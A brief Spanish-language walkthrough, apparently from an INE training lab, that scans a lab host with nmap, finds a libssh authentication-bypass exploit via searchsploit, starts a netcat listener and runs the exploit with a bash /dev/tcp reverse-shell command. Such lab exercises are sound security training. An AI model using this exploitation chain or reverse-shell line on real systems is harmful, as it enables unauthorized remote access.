Empezamos targeteando target1.ine.local y lanzamos escaneo:
nmap -A target1.ine.local

Vemos un servicio sospechoso de contener vulns, lo buscamos en searchsploit :
searchsploit libssh

Usaremos Unauthorized Access
Descargamos con searchsploit -m 46307.py y ponemos nc en escucha:
nc -lvnp 4444
Ahora usamos el .py descargado para mandarnos reverse shell:
python3 46307.py 192.33.20.4 22 '/bin/bash -i >& /dev/tcp/192.33.20.2/4444 0>&1'
